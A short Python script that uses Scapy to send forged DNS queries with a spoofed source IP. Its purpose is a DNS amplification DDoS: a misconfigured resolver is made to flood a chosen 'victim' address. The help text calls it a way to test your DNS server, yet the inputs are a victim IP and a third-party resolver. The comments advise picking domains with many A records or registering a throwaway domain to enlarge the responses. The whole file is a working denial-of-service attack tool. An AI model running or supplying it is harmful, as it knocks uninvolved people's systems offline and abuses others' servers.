#!/usr/bin/env python3

from scapy.all import *
from random import choice

# Populate this list with domain names with lots of A records.
# IRC server DNS pools are a good place to look.
# Maybe get a cheap throwaway domain and add your own A records.
names = ['irc.efnet.net', 'irc.dal.net', 'irc.undernet.org', 'irc.freenode.net']

def gen_pkts(count, victim, dnserv):
    pkt_list = []
    for i in range(count):
        pkt = IP(dst=dnserv, src=victim)/\
                UDP(dport=53)/\
                DNS(rd=1, qd=DNSQR(qname=choice(names)))
        pkt_list.append(pkt)
    return pkt_list

def dns_flood(pkt_list, interface):
    send(pkt_list, iface=interface)

if __name__=='__main__':
    import argparse

    interface = get_working_if()

    parser = argparse.ArgumentParser(add_help=True,
        description='Test your DNS server against amplification DDoS Attack')

    parser.add_argument('-i', default=interface,
                              help=f"interface name ({interface})")

    parser.add_argument('-a', help='the IP address of the victim')
    parser.add_argument('-d', help='the IP address of the misconfigured DNS')

    parser.add_argument('-c', default=1000,
                              help='the count of sent DNS queries (1000)')

    args = parser.parse_args()

    if os.getuid() != 0:
        print('Must be superuser.')
        sys.exit(1)

    if not args.a:
        print("-a (the ip address of the victim) must be specified")
        sys.exit(2)

    if not args.d:
        print("-d (the ip address of the misconfigured DNS) must be specified")
        sys.exit(3)

    pkt_list = gen_pkts(args.c, args.a, args.d)
    dns_flood(pkt_list, args.i)

# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file
